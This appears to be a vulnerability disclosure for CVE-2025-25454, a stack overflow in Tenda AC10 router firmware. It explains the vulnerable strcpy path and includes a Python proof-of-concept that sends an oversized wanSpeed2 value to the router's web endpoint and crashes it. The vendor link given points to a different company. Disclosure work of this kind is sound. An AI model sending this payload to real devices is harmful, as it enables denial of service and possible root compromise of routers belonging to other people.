- Affected Firmware: US_AC10V4.0si_V16.03.10.20_cn_TDC01
- CVE-ID: CVE-2025-25454
- Root Cause: By analyzing the webs file in the bin directory, I found that the function 0x45C380 contains a stack overflow vulnerability.
- Impact: Remote unauthenticated attackers can execute arbitrary commands as root.
- Vendor Website: https://www.totolink.net
- Affected Firmware Download: website
During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the Tenda-AC10 router.
By analyzing the webs file in the bin directory, I found that the function 0x45C380 contains a stack overflow vulnerability.
The stack overflow can be triggered by the wanSpeed2 key value, which leads to a strcpy stack overflow.
It can be seen that there is a stack overflow in the above function. To call this part of the code, i in the following function needs to be greater than 0.
It can be seen whether it is triggered is related to v4, and v4 is wans.flag. However, in the case of qemu simulation, the value read from GetValue("wans.flag", v4); is always 0, although the following is the default setting. But in the real environment, we can make the return value of GetValue("wans.flag", v4); greater than 0. In order to better carry out the attack, I have made the following processing.
Thus we can successfully invoke the code where the vulnerability point is located to achieve stack overflow and control the program execution flow.
Use the following command to simulate with firmAE.
sudo chroot ./ ./qemu-mipsel-static ./bin/httpdThe content of the poc.py file is as follows:
import requests
import pwn
url = "http://192.168.229.128/goform/AdvSetMacMtuWan"
data = {
"wanSpeed2": "a"*0x300
}
res = requests.post(url,data=data)
print(res.text)
Through the above figure, the value can be obtained. Successfully, a stack overflow has been achieved and a segmentation fault has been triggered.